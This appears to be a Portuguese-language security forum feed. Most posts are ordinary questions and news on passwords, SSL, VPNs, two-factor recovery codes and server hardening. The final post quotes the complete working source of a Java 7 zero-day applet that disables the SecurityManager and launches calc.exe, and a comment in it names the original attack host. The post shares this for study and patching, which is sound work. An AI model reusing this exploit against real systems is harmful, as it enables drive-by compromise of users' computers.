Search the Community

O NIST publicou recentemente um conjunto de recomendações para relacionadas com autenticação, que incluem algumas recomendações sobre passwords, que vale a pena ler: Em particular, temos agora recomendações claras para acabar com os requisitos parvos de complexidade de passwords que não baseados no tamanho, para que as passwords não expirem só porque sim, e para acabar com as questões de segurança.

Olá amigos. Preciso bloquear o acesso à página de edição de dados de um determinado jogador que faz parte de uma determinada equipa. Apenas um utilizador (diretor da equipa) registado e com login efetuado pode aceder a esta página (até aqui tudo bem) para alterar os dados desse jogador. Pretendo bloquear esta página para que o acesso seja feito apenas a partir de um boão (editar) colocado à frente do nome do jogador e não com copy/paste do link ou com alteração dos dados que aparecem no link como seja, o id do jogador e o id da equipa. Já tentei várias soluções mas sem sucesso. O botão editar tem o seguinte código <a href='fedit_elementogrupo.php?idelemento=<?php echo $linhas['idgel']; ?>&idgrupo2=<?php echo $grupo; ?>'> <button type='button' class='btn btn-xs btn-warning' name='edit' id='edit'><?php echo $lang['ede2'] ?></button></a>

Por enquanto a combinação XAMPP/Windows é o único cenário é está confirmado que o ataque é possível.

https://spectrum.ieee.org/lean-software-development

A Google lançou recentemente a ferramenta Capslock, que permite compreender de que forma é que as dependências de um projecto estão a aceder às funcionalidades do sistema, como a rede ou ficheiros. Isto deverá facilitar, por exemplo, a identificação de dependências maliciosas. Os supply chain attacks são das coisas que mais me assustam, quer ao desenvolver aplicações, quer ao instalar aplicações de outros. E tendo em conta as dificuldades que tenho tido em convencer colegas a minimizar as dependências dos projectos em que trabalho, este tipo de ferramenta parece-me algo com bastante potencial para detectar problemas. Em certa medida, é uma abordagem alternativa/complementar às reproducible builds (recentemente referida aqui pelo @pwseo), e embora me pareça que esta ferramenta dá menos garantias, talvez tenha mais potencial de sucesso em termos de adopção por programadores. Só é pena suportar apenas Go 😄 Mais info: https://security.googleblog.com/2023/09/capslock-what-is-your-code-really.html

Bom dia a todos. Gostava que me pudessem ajudar pois quero zelar pela segurança de toda a informação que quero armazenar sobre clientes. Eu tenho um formulário com cerca de 20 campos que tenho que preencher com informação critica e queria ter a certeza de que a informação é enviada, armazenada e consultada com segurança, isto e, que ninguém consegue aceder a essa informação de forma ilicita. O formulário esta feito em html e é armazenada num servidor online agradecia que me dessem ideias e como fazer. Sinto-me um bocado desorientado e queria que me ajudassem explicando o que devo e como faze-lo. Já me falaram de usar json e que se instala-se um certificado ssh no servidor não me precisava de me preocupar com nada, mas antes de ter que aprender a usar json e instalar o certificado queria saber as vossas sugestões. Aguardo as vossas sugestões de forma a eu fazer algo em condições e ficar descansado no que diz respeito à segurança dos dados de outras pessoas com que vou ter de trabalhar. Cumprimentos a todos.

Boa tarde, Alguém sabe se é possível no próprio código ou editor é possível substituir carateres por * . Eu tenho algumas passwords num ficheiro de configuração mas gostava de ao abrir o editor e vez da password fosse tipo asteriscos . Eu uso o Visual Studio Code Como está/Como queria <?php $pw = 'password1234'; ?> <?php $pw = '********'; ?>

Um estudo um pouco assustador, mas não totalmente surpreendente, sobre a segurança da generalidade dos routers para o mercado doméstico. https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/HomeRouter/HomeRouterSecurity_2020_Bericht.pdf

Boa tarde, Gostaria de saber se alguém já implementou um sistema de segurança (cópia, utilizadores ...) com as seguintes ideias em conta: -Tenho um aplicação de terceiros (que não possuo código fonte ou acesso ao mesmo) -Desenvolvi um sistema de validação (tipo webservice) em que vou validar um conjunto de ID's de hardware e outros itens. -Pretendia que a primeira aplicação só fosse possível de executar após validação com sucesso da segunda aplicação. Sei que existem soluções (tipo Sentinel, Hasp) que fazem envelopagem (um ficheiro dentro do outro) que permite fazer essa validação. Mas é uma solução proprietária e que não se adequa ao que pretendo. Alguma consideração em relação a isto ? Obrigado

Boa tarde a todos Eu tenho um computador em casa que está sempre ligado, computador esse que tem varias câmeras de vigilância ligadas a ele. Eu através do ambiente trabalho remoto consigo aceder-lhe está ligado a minha rede de casa, mas quando estou fora e preciso de lhe aceder não consigo. Pelo que pesquisei uma VPN ia-me resolver o problema. Tenho internet da MEO e o meu roter é um Technicolor TG784n v3. Existe alguma maneira de ter uma VPN gratuita? Já vi um tutorial no PPLWARE (https://pplware.sapo.pt/informacao/tutorial-aceda-remotamente-sua-rede-meo-via-vpn/) já segui todos os passos mas depois não entendo como me ligar a VPN fora de casa.. Se alguém me pudesse ajudar agradecia. Desde já obrigado.

Fonte

Boas Preciso de instalar um certificado ssl no meu servidor iis alguem sabe como se faz este processo? Ouvi falar deste letsencrypt mas nao encontro o exe

O DevFest Coimbra’16 é uma conferência tecnológica que se realiza no dia 3 de Dezembro, em Coimbra. Organizada pelo Google Developers Group (GDG) Coimbra, integra-se no ciclo de conferências GDG DevFest promovidas globalmente pela Google. Tem como objetivo, trazer o que melhor se faz de tecnologia ao centro de Portugal. Esta conferência é dedicada às áreas de mobile, web, design e segurança. Combina palestras, apresentadas por oradores de renome do sector tecnológico, com workshops tecnológicos, de forma a permitir o contacto direto dos participantes com a tecnologia mais recente e inovadora. O evento tem um custo associado de 5€, que revertem totalmente para a Liga Portuguesa Contra o Cancro e podem ser adquiridos: http://www2.last2ticket.com/pt/events/101/devfest-coimbra-2016. GDG Coimbra O GDG Coimbra é uma comunidade amadora de pessoas interessadas por tecnologia que se juntam para discutir ideias, desenvolver projetos, partilhar ideias (ou simplesmente beber uma cerveja, acompanhada por um nougat, o nosso “doce” atual de preferência). Entre os vários eventos organizados este ano pelo GDG Coimbra, constam: Study Jam (workshops), Developer Stories (palestras), I/O extended e Gather Hour. Redes Sociais #DevFestCbr #DevFest16 #GDGCoimbra Mais Info Site: http://devfest.gdgcoimbra.xyz Tickets: http://www2.last2ticket.com/pt/events/101/devfest-coimbra-2016 Facebook: fb.me/GDGCoimbra Google+: https://plus.google.com/+GDGCoimbra Twitter: @GDGCoimbra Email: gdgcoimbra@gmail.com

Desde a minha primeira tentativa de usar um sistema de two-step verification (com o Google, há "muitos" anos atrás) não fiquei muito impressionado com o sistema. Por um lado por causa do impacto em termos de usabilidade, que me pareceu bastante negativo. Por outro, porque me pareceu que o sistema podia ser seguro de mais, e aumentava a probabilidade de perder o acesso à conta. Recentemente lembrei-me de estudar novamente o assunto, depois de receber mais um email de um serviço a recomendar a activação desta funcionalidade. E estes sistemas continuam a não me agradar muito... Temos serviços que obrigam à utilização da aplicação XPTO, e não me agrada ter que andar a instalar mais uma série de aplicações para os vários serviços. Por isso, quando possível, prefiro SMS. Contudo, com as funcionalidades de receber os SMS também nos PCs ligados ao smartphone, este método também fica com uma segurança mais limitada. Mas aquilo que mais me preocupa é mesmo o facto de habitualmente precisar de recovery codes para não correr o risco de perder o acesso às contas. Aqui a questão é como armazenar estes recovery codes? Guardá-los no PC não me parece totalmente seguro, mesmo que cifrados, visto que há sempre a possibilidade da segurança do PC ser comprometida. Imprimir este tipo de informação também não me parece lá muito boa política. A ideia que me dá é que este código vai acabar por funcionar como uma password, que se for comprometida também compromete a conta. É claro que terá a vantagem de não ser usado regularmente, o que ajuda a que o código não seja comprometido. Assim, gostava de saber quais as vossas opiniões, experiências e recomendações sobre este assunto.

Entrevista Virtual a Edward Snowden pelo "The New Yorker Festival" (11-10-2014) Snowden está classifocado como um terrorista e é procurado pelas autoridades por ter divulgado informação confidencial. Atualmente vive na Rússia. A perspetiva do próprio é muito interessante sob várias perspetivas: Até que ponto vai a vigilância e monitorização sobre o que fazem os utilizadores na web e com os seus mobiles; Porque é que este não é um problema apenas dos USA Como podem os utilizadores contrariar "castigar" as empresas que o fazem; Como pode um leigo estar mais protegido; Porque é que o tão falado argumento "Eu não tenho nada a esconder. Podem ver os meus dados..." está errado... Aqui fica o link: https://www.youtube.com/embed/fidq3jow8bc?start=287&feature=oembed

Boas, O meu problema é o seguinte, eu tenho um site que tem como root: D:/public_html/ e eu criei uma conta FTP que so dá acesso ao directorio: D:/public_html/user mas, com essa conta eu posso entrar em ftp e fazer UPLOAD de uma SHELL de deface, e aceder ao root ou seja ao disco D: e TODAS AS PASTAS , SUBPASTAS e ARQUIVOS! Como faço ou para tirar permissões de acesso para que nem a SHELL consiga ou melhor ainda BLOQUEAR as SHELL's que possam vir a ser upadas? Tou com urgencia nisso, agradecia que alguem me podesse orientar

mais: https://www.openssl.org/news/secadv_20140605.txt

in PCGuia

O título do tópico diz tudo, estou à procura do melhor livro sobre segurança ao nível da administração de servidores em linux virados para o web hosting. Bem sei que "o melhor" é algo não consesual, pelo que aceito todas as recomendações de tudo o que seja acima de bom nesta área. 🙂

Boas 🙂 Há alguns aspectos a ter em conta para criar de raíz um tema para o WP, simples, mesmo que não utilize todo o potencial da última versão da plataforma, mas feito de forma segura? Eu sei, a minha pergunta é retórica. Há! Tenho andado às voltas e gostaria de fazer um. O problema não é fazer o tema mas a preocupação em que seja segura, isto é, que não sirva de janela para ataques já que faz uso do PHP. - Para o que pretendo, estou à vontade com o PHP, CSS, HTML (e Javascript) - Não pretendo ter nenhum plug-in À parte da escrito do código poder ser comprarável a uma pintura de Picasso 🙂 a minha dúvida é mesmo esta. Com o tempo melhoro o código com base no meu conhecimento. Muitos dos ataques que vêm a público têm em muitos casos a ver com pass, facta de actualização do CMS e plug-in's. Thanks 🙂 Obs: quem diz WP pode também falar de Joomla! ou outro.

Quando faço upload de imagens, poderá haver possibilidades de criar uma nova pasta automaticamente, e como tal, como pretendo maior segurança, gostaria que fosse possível criar um ficheiro "index.php" (em vazio) ou então copia-lo de outra pasta, para assim, obter uma maior segurança entre todos as pastas. Alguém sabe um método para esta questão?

Bom dia, queria se fosse possível que me respondessem a uma pergunta Eu estou a pensar em começar a construir uns websites para algumas empresas, tenho portfolio..., o meu problema e a maneira como estou a pensar em fazer, para angariar clientes pensei em oferecer pentests, claro que se estes testes fossem feitos e apresentassem vulnerabilidades nas plataformas das empresas as quais o teste era oferecido, obrigatoriamente elas teriam que me comprar a plataforma Eu sei que por lei eu posso efectuar testes e invadir plataformas dez que seja autorizado pelo proprietário a minha duvida é se posso invadir plataformas autorizadas pelo proprietário se elas tiverem alojadas nos servidores da empresa que criou as criou ex a abc desenvolveu uma plataforma para a empresa xpto e o website encontra-se nos servidores da abc Depois encontro-me com a xpto e ofereço o teste de invasão, será que o posso mesmo fazer legalmente?

Tenho um sistema que utiliza base de dados access. Nela tenho uma tabela Tbl_Usuarios com os campos: ID, USER, PASS No sistema existe a possibilidade de trocar de senha, mas ainda não sei como implantar a parte de perda da senha. Se o usuário perder, ou esquecer a senha, tenho adotado a prática do administrador do sistema ir no cadastro de usuários e trocar a senha manualmente, com os asteriscos é claro. E passar via email a nova senha para o usuário. Alguém poderia me dar uma sugestão de uma melhor maneira do usuário poder trocar a senha sem ter que informar a nova senha ?

Como o título do tópico diz gostaria de saber quais são as formas de tornar a nossa ligação à internet mais segura? Para além da utilização de um antivírus e de uma Firewall (como deve ser configurada) existem outro métodos para aumentar a segurança da nossa ligação por exemplo encriptação ou ligações a VPN? Se sim como se faz agradecia um tuturial se pudesse.

Oracle Java JRE 1,7 Expression.execute () e SunToolkit.getField () falham a restringir o acesso ao código privilegiado Já existem várias publicações sobre este exploit, apesar de não haver ainda um patch definitivo, já existe patchs alternativos. Este exploit apenas afecta browsers e aplicações que corram JDK e JRE. Link do alerta da Oracle Link para o US-CERT onde se encontram disponiveis patch's não oficiais e mais informações Link para blog com mais informações e informação de como verificar se se está vulnerável Abaixo fica o código que se encontra disponivel, sobre o exploit, para que quem se interesse possa estudar, apenas para fins de pesquisa. // // CVE-2012-XXXX Java 0day // // reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html // // secret host / ip : ok.aa24.net / 59.120.154.62 // // regurgitated by jduck // // probably a metasploit module soon... // package cve2012xxxx; import java.applet.Applet; import java.awt.Graphics; import java.beans.Expression; import java.beans.Statement; import java.lang.reflect.Field; import java.net.URL; import java.security.*; import java.security.cert.Certificate; public class Gondvv extends Applet { public Gondvv() { } public void disableSecurity() throws Throwable { Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]); Permissions localPermissions = new Permissions(); localPermissions.add(new AllPermission()); ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions); AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] { localProtectionDomain }); SetField(Statement.class, "acc", localStatement, localAccessControlContext); localStatement.execute(); } private Class GetClass(String paramString) throws Throwable { Object arrayOfObject[] = new Object[1]; arrayOfObject[0] = paramString; Expression localExpression = new Expression(Class.class, "forName", arrayOfObject); localExpression.execute(); return (Class)localExpression.getValue(); } private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2) throws Throwable { Object arrayOfObject[] = new Object[2]; arrayOfObject[0] = paramClass; arrayOfObject[1] = paramString; Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject); localExpression.execute(); ((Field)localExpression.getValue()).set(paramObject1, paramObject2); } public void init() { try { disableSecurity(); Process localProcess = null; localProcess = Runtime.getRuntime().exec("calc.exe"); if(localProcess != null); localProcess.waitFor(); } catch(Throwable localThrowable) { localThrowable.printStackTrace(); } } public void paint(Graphics paramGraphics) { paramGraphics.drawString("Loading", 50, 25); } } Segundo li esta manha, ainda existem demasiados equipamentos vulneráveis e uma vez que já existe patch para a falha em causa, pareceu-me bem, partilhar o conhecimento. Este post destina-se apenas a fins informativos e educativos, sendo o uso da sua informação bem como informação constante nos links disponibilizados, da responsabilidade de quem a utilizar. Cordiais cumprimentos, Apocsantos